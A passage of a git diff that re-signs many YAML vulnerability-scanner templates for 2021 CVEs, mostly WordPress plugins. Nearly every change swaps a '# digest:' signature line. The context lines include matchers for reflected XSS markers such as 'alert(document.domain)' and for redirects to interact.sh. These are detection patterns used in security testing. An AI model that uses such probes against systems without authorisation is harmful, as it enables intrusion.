490a00463044022022c3f4c8a253a0ca42a4dbc4b1e5b380282bb8c144c9e8f77742f1cff60d99f102203ea657499bcc1d4aa7ba2e2274da1843a3fbf033ed0fce8e61bd82da11c8d517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220653c3ef0c85ebe00a73a606b2047ef3b5bceeb57806faaf8db6bf25a652739560220364e23a86aaa3a59d26e2adcc9af7ababaeef957d58031657f7894ef82384c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 517d6e4da2f..73abab05bed 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 400 -# digest: 490a00463044022079e29fbe11fafa116e9eac9d51f9c4a3479429e41b0de33e40feba5fd883ec25022059785e7f38f4e77e33a8ccf37707498b2138a07b156aa48188b91c1a96f61aaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff83dccab893267788df29a04b79b1c9b08fc096b09ff7fd1daf40a926bb13eb022100d16c419975775523ec78b80e8ec6aa97e8c3f1dce276b685bec642d89ca02fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 1b39d0f5104..52400a5760b 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dcf8b69f932110e17c1944f8f6430923f66764c0f22d83545596c39e91ef7ed4022100f1833f23b9a277418c6af2f33d32ebc8a7cfa185d7d383c571d9e1b40ba7a889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202306118f9087e7124f52cdcada35150f1b3a2958874a798595bcbb9992c19490022015c6fa1942295cc7873ec96334397aa6c99aeaa3853b2105bb7ff77c1c03e004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index dd37421e3cf..58ba9dc41e7 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100baff3d260dfa1ce74beb10322eeb48fb091e2f1637fe053e50299d8d3a856181022100dcb0fca6d1786fe8840413efe6a5ece1a0daa794962439918261762c2c66d211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c9dd441988d11cc3ac15c97b05813eb6d5133d5631e2b0ac1cc280bdd255838022026e1aa50a08bed3340db89abe62299701aed108d4ee40022c61a626b9e068b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index fb3a987c71d..2dd8f84bc50 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ef1b89bcdfc56286be3f52b51ac03aba1544cbde7fc8e960e82f7d43ffa11ba022079ba4e4861d875f955de75c75ca470cec320ffc8f85a40e61ee9223f1dbf4048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021291dc3a826f8afdccb9ceadeb29cff25c8bc964c49e69a1c76e50ba5d05b0602204ecc73fb7562a8a08c4d5801850f2c27596c1ac2c84bca47337edb773dc7c7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 4dcbc16abbe..7584134b5e3 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -55,4 +55,4 @@ http: - 'status_code_2 == 302' - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and -# digest: 4a0a00473045022100d40676f3abbc93032c1a53a229bdcb97fbfac1cf51a8f17f5342ca6341bbad88022068d78608026197a6696000fa868ae6369a022429c4ca0d7ec5fae479e5506232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba4404a71a75d068d9e03d3bc9ce5a67011418edf835c22d347537e4249758dd022100ea1edd963069d16747b9aa5c5fbe55192a7a7ced546ca04af0848090536bb003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index d233378f0e9..94eaa41a5fd 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and -# digest: 4a0a00473045022052a6c46cee14622fa563c2e5944dd146c7540bf9492ec96119d0e74e6181b20a022100b34a6fecf8ddfe3ea45dae57ce80ffef44316b4ad9d6d1871e6873d8729c22d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d8da8c15db9a2431a190b5408af51f42c6f8d7831e2d2c9024e80120b382a8e02205e2532620bbb5779d62d0786eeab003181828d72742974f0d2ab30088eeaa23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24170.yaml b/http/cves/2021/CVE-2021-24170.yaml index 2c2da815f1d..d71e2746ff3 100644 --- a/http/cves/2021/CVE-2021-24170.yaml +++ b/http/cves/2021/CVE-2021-24170.yaml @@ -78,4 +78,4 @@ http: - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100d9e4de2195d8015d1608570067ac24918f26b16f4c3fd3b5aaba311c5d5e857b02201f20d74944ec55f412a2727c725e3e99bb4bac13fb481953bc7c071682c374f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e700371c46e4b30ebb2b1cbe9900f9c0074ceeed35c6475625d1b15cf75af6c022073542e07d71d6d26b7c66c06cb3748a74f31b22753192a2536ff7c20cd024071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index 9d5657d1df6..ebf6b35eef0 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011a64d546ae262dc673573b06319d5a6d6912d656f239a98d400dffe7a36f07202204634dddc28a29f5cccd3b1cc24c37fa3db267a55de933995f9172806754c9c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009a4da98cb564de31b96d334ef44b1e373c4ba5c4f93c74636f12408b99ceafa022100b4509d0f11f5ef570ca57df7c8700632065aca1464be9bd4d02fcc4a5f6e9674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index ab10ee023a0..6e0ccd076d5 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402200dcbd2b0fb0e4549a758a31a9f6599e292046d53c1ec54c1dc90c6ded5c0efb10220588cdc9c8fcd8ec65ca0206376700fb5fac2f007da1e1dccbfaac5d753b96d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa027368b472b920f87d7e05812d7a423379ee5b6f47ff7ff1d94e1bc27302cc0221008f8db16d803e17c18b229193580d83b10ee4ed6bc08eaf9f17fca70eba7b2af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24212.yaml b/http/cves/2021/CVE-2021-24212.yaml index d6352b89844..0de3214a440 100644 --- a/http/cves/2021/CVE-2021-24212.yaml +++ b/http/cves/2021/CVE-2021-24212.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d6a11104eb3b3d9d07c3c8bb765b52297914ed12d75bbaae8d7d1a5c66696e2022100ca982fc2bbeea64a606da9422e2f396070d66d34b7e812d577422bc0cdd01cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100892f5f67877987152527c54b8fc2cdc62e4eb1b6c2364f315977c07b325c3082022100a4e432129e74351f647549ae6ea5f3922ded365a6176c43874ab5538e9151613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24213.yaml b/http/cves/2021/CVE-2021-24213.yaml index 2b9228d474c..b7e254a15d1 100644 --- a/http/cves/2021/CVE-2021-24213.yaml +++ b/http/cves/2021/CVE-2021-24213.yaml @@ -59,4 +59,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "give-donors")' condition: and -# digest: 490a0046304402202ec466a309578d7ed5ff19049a9525e122dec4779c24ea26eea79d9ba398ad7602201f48d106e043e5fc2076e7145193bb8f9ceb9ddcb6e44e245860b1d58110f9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7021e259de13b4605f62965d0bd5005f53153819d7378be468bdafa62040ef8022100e5e0aee65ef120a419f701b79ab4f63425572246b916e4e3ce6552d3e1df188d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 7adf5286cfb..ff719349015 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc2b1d4af6868b0888694495f13d18fffb8ab8048486986ff08e6d753ec2d503022100b9dcb773b097c9c03aaff152e3f9c8549e9020f96eb695c35905ca6be1ad0af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb4d9b96d5cc6e9835586f411644943384fd5f347fdaa51653ff2c825fc5be41022100db547de36ae7209adc78db3091908bc34d1d5c43ceea3b28929270ee022d29c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index e8429c3053f..ac72f4df2a5 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4b0a00483046022100f6d55376b2ac3446348e65060872b89ddfe3cc23a813af645341d60da78c5614022100bf9033e7e0236e46d73c47c279729c3562ee1e35308cf6fedcf0691967bc142f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f601f0b0fd59b71bca2d16a40ce049e80873297e6f8499c5ad4d30ae74f5caa02201303f916f6ddb2e89294863b849d0690a390e2bdfcf24ee64f8f45171c9f3ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24219.yaml b/http/cves/2021/CVE-2021-24219.yaml index c571daa27d7..8a056c4bd0e 100644 --- a/http/cves/2021/CVE-2021-24219.yaml +++ b/http/cves/2021/CVE-2021-24219.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca4d18239e73c5542810972c2aabf95d6f141bc396b9f030f2c23430614793fa022100cfa091b4bb501cc53a4c86826d868c6ef549233da2c0be50799bd8556cb81861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220437eadafa5bf47692c75ca0967228ec00035f9db296fd10a854b114390a31af20220656d0cda02a0f117e4bd512b766aaca09e97d66d2c02eb538656c610540e48b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24220.yaml b/http/cves/2021/CVE-2021-24220.yaml index ee1ef13dbb8..75bb0248673 100644 --- a/http/cves/2021/CVE-2021-24220.yaml +++ b/http/cves/2021/CVE-2021-24220.yaml @@ -79,4 +79,4 @@ http: group: 1 regex: - 'Version: ([0-9.]+)' -# digest: 490a0046304402207a93858fb2d1d9952f9e75fd6d96fbcdac4518afb434c1142457589740e4c33b022018a4eefafa8a213041790be523a55db6ecc51822c4d817a0b71e679308024a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008abc760c35ab7a9b33c9657492b6ac1f5b47e0b676f85eb44de9553b2b05eb7f022027af719b71a6ca3b9c12f805d4fb593488549b31ff32467ecdbc4f929c81bf24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 5127de5d067..5345a830d52 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8f33ed69deecd3f2ffa0956660e6b1c0e6248db3856e4b32725b2e739a5365a022100f52fa10510680a62a6bf927ea35bf08f16be88092af8ce6e31a5d568399fd249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ac2667f835231a02e150b29ea952f8b4b0243d6cca0ea0c39c428a8a98540c2022100d60b8f8dc9a6e457e1b792edf31340ecbac23a53ae1dbcb4a7c0b838cfd22afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index c7dce40391f..ed0adb623aa 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc13b021150597b5fa5705118b111d61b0d8eaa9d20db5a69c62fefd2db4e70f02203a0734789c5e3910b5111d4ed6588381b78d601cc203453d13432562a1215910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3b9efc7fc337b160c738ffa03fea4699362e3ec1bbf20847c656938a275f96a0220249fefb7dc8f82fd9d2310368731611b2212d075e3010787ed9a764d031713be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 45406f5586e..000cfdb66c5 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006a41b4d03d464d92a978707f9b3aba65e651562cc534a5f79642bfda2f12914022100c55c01d7c56b1b2d482ce6d6b38b22b7419a9427b08b2c4f65ebdebfb7676999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b935a3f592caeb55923a6bb5142cbc1bef937e6a81c78192c745be8ed101c0c0022074a1d7b8052aacbc717e2ac6887e86d858a1835f63f0d5395af29807d0565027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index c781d2d1ffc..c9bb47922d3 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -94,4 +94,4 @@ http: part: body_2 words: - '{{md5(string)}}' -# digest: 4b0a004830460221009d4da0b847329af1e3a640fade65fb312ce4c101716065011aa9e1fd8ca99d8f022100ed3913d102d7b8791d7eaeedbb622f2815600fad54a7fdd957e129f2a1eeed25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d3d5f3bc3c58f1617c70c0bb63e27e2e30a3cfa67fed410de72237488a462b202207fa758dbd33cce24e3431b270ce417257efc6133f844a6e85b3b7bf3040198b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index eb51a40a52b..99466031e52 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ea2c791ae1b0a6db8fb288423c4b837d40d2e3867c6d9dfbf50342e5f107b52022047d8332c2eda0cfc0e808663d280306d8b407671d011cd3404eb3eb1a518f818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a8eccc64479365b514fbe97b48ebe7cfa467a1109a715b9f286ce2efda3bb8630220200267f89d36de9dec5ac956b5be781a01bf2af7baec5efcc09031af6e34e622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 1c006a03a6a..bdcc93392e1 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "") && contains(body, "invitaion-code-table")' condition: and -# digest: 4b0a00483046022100d88fb4c7e6fd6d82a93a0dd7085a56f3e200c537f9bc7278467ba71640929a3a022100a687722699011a2feb921c13c4d06243a67eb47073ebb115e26a32b482afbee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5f71231ace7514b9eb573c3019e5831b0cc789c901ab76a16970c63c7e9da67022100e1831236c5cc5279f08a4e529978484f21594170e3f819456584c103428f5e9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 5749ef6d1ad..5de0ae57f07 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c4160d3d379d2166c5ef7492b495c8e5d9f998329d3ae172389d4562c8b3d2530220626eda7c3a31f3d716ebfa353594cae01fdbe1eaaf124580fe9a05836ccb1df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e044de43f5248953fb1cf2731240404eac1244197508dc58b1f9e86178ef8552022100b5f8cf69bce7d682f6c49dfeade76cfdc17c27ea55e3e202470ce2fb5388f40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 5001e136517..36faff88988 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033714d36135d4835aeeb126cac447564777ec0693236255155ea301fd81eb38102200a14ed5bf58a1a933a7bb200cc04ef70d58655e69d08ec7d1700ec6bb720f9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082d2ff30587ce0441dff8d67c054bf065d93a5f73313c37de5977bf770dafb6302207d0cee2193d3838beda82fe7e494681fb5ddbf3dc1ff101adade865dfbbae3f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index 73607b59e9e..feeffab0cf1 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' - 'status_code_2 == 200' condition: and -# digest: 4a0a00473045022100e1aeb79be3cb7f3ca13c1463e412b03a4a50c49e0c0dfd667d7ead4b5cf8c86702204a4ee08ca0f244dee8735a880b589951a731bb9074f5f44edae520ce3bd8150a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c897e5f455760b986db816df0c7caa5f543ced63e4e18e701174f443c40856d02200c94ffc343d86a93e5dd44f6bfc76c9ba246f0f69e21487bf26a1e05c6250627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index d9655469bef..83b9063d26c 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and -# digest: 4a0a00473045022021e815d5c31f698b0270b13ee083983fe7470995371505543ce4fc5fef3d86db022100b828ae5c5c0ff9de5e5ecbfbce801eef9da69d9101ccc79f2e2d46212276b0b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d440c85a50792e5cb9d13a1e4bb0f79176771eff73c3660e88ba6ded9b824e8022100f8adff5af4c4b282c422e28e69bbc0ad754939ab8ee6fe68010d91af8048af85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index d2baa59291d..ce7e4ab6674 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044021f3fd91e26a6ed200efbb863a6f26d56e43b0eef581277562d017cd9b69cc4f802210089526ead9052fd3ab67f5bbfd278ed17927c0e8045a83c055e28e981da74b125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4c33f86be04da661ef6732e49c1160d71a3e17d0d3eab8eea5d5497ace5eedb02210087aa84c47341f41f5b5d2c0d41f539996f8331d965882b2b67d1af00efc0897a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 05248a6c67b..51d5e1dbd3d 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e831617a3fd7a3960e114e873f0e2eb2e47ecf04461d7e3843a868141f178afd022100f68dc6ab6fa50b4202d17e92eac98a4a6547ea9cdfdd4ab2ff47a73cb05066a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a159ec337e58d65d26ba5f52bcdb085f3f259460b3420f1d679d1ecfd7604de3022100afae0930c8f1178674914bee0c0a7c0ebebc0c4d3d4c005322b4753d15031129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24295.yaml b/http/cves/2021/CVE-2021-24295.yaml index 0361a147d44..6ebef769a98 100644 --- a/http/cves/2021/CVE-2021-24295.yaml +++ b/http/cves/2021/CVE-2021-24295.yaml @@ -51,4 +51,4 @@ http: internal: true regex: - "(?mi)Stable tag: ([0-9.]+)" -# digest: 4a0a00473045022100bfa7a6fde9fc95e6b642a8ce81064310a393c1c9dcea7f1a43b62a35a2c76431022062bbde8045d5e6c560ac523b659416dc62ac86f7a2d2e34878191745755eff77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204222d5caa130bb192480bc8a965132c4c39e9584650a341407c812df84f95937022100e0d19ec4e7de63935fc5c7d155040568c4cbe7d302638ee800001cb63c1df5eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 6db80558b2c..ff23f781654 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e1888955cffe85be0a52d61e2b9b7ed6d164868addbb654a92a31ea7c1a5f715022100dbce842b1c51f18313c316076e2bccab1df2ae7befdb86525ce9c7d6a7bce976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb38d4a2f99d46e684c72090fa12854a8e02960a599a783d55d035d2efbabf380221009523d7ee999356196666bab4de4f856856dab75987c9c123c219205a630455d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 52a05ecc863..3f857188588 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc4f90948a93199f3555aae654407241f2d00fe937857007f9daf0882fb13f52022100cd977a84c92325dbf67540cd7af719284ce03e5c2fd062e1f8c5296ceb97a7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3c7e8ab51fde573a71768f0033e7268dfcd6e8cc1e78a3ac294b8e7a66e22a802206d33291b4fae92309c7914bc37a46260ee7f3c93a1555ea0ea277d569174c238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 597ae9817db..c535ae5e920 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b8d04cfdd1da971e2a5ca08614270ee61517e3dfd3602b81452baa0255e18c1202207b62bad4a825bd4ae424281a5aa67591c67d88789f5eec1b36e7cf90c070c8a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5307c4d5a7b56804394960921c08d1d5e23ad45f5f1843e4001fd7d9e6167de022072dd9ff13a6f01501a18f9328366be394559ea0207ace5d0a6c07c30c00424e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index bac8c51269a..19fc7230e2c 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa0a0150008acda3c6dcec7a01c6cbb32b597e7ee5ef4305c1e3556a76efc949022100d8be99c006f0bd1b9b055cbd1dd97ea291fc1148a9632d46ca91140693aa3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204626bf2dfb15800960401654a0845747a4043dfe832f1eb2d753b85a54c7dab902206fd1e6d4e2aaba5a2f78e50de0d94dbbd071b664831b9045b374d28c44fe7f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 49251b7cc2e..a09deb2865e 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc803787fbca6657b97e837552029209b9164bd26024d5cd27010558e1df186b022100d8a045a76b9dfc86ecf51dc90f6ba5294e153b1e43a471f0037aeb99c7153d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9348fc9c246b60db86ed1b35eb72bf9fbe8fcd1aaa05929e2c2f5ee25fdbcd0022100f2718e28ab6b33391108aa6c6e59e8ce1de7862431027e9fa0a80454f9a6faf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index ed321c1566b..10c3028495c 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab4e96e9393212add18644da719456b8f9ecfc275930ae1493ed7fbde0bc44100221008af5b5a55be767c32910db2c94a1ac18ac9d99982d56b8c5a10bf3c7ff8251bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bd9a810c1ea3a788013c5e94d32eb176ac6ccba6b8b44163e5122e92bbc674d0221009e88f5f69461813605a215e959c4d3bba30e69ef577ce4e0ecf5fc33d124c1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 7ae1608bb0e..cb3163e7dbf 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0df38a8bcf9d7802ffa2fff61535fe1d5bea2f401cfe6a2237ec8cc8dbdf29c0221009037782a069dc7555dae972cf80a4cc479cede29330cd14caea90635cf831502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad6437f22f96c63f2a0cb157f70bc82faff179679f242236170c5f106f946ef3022100fec7dc06bdffd71cec072b5e8d48445b5c90f12f9e519dd3b3361469affb3940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24370.yaml 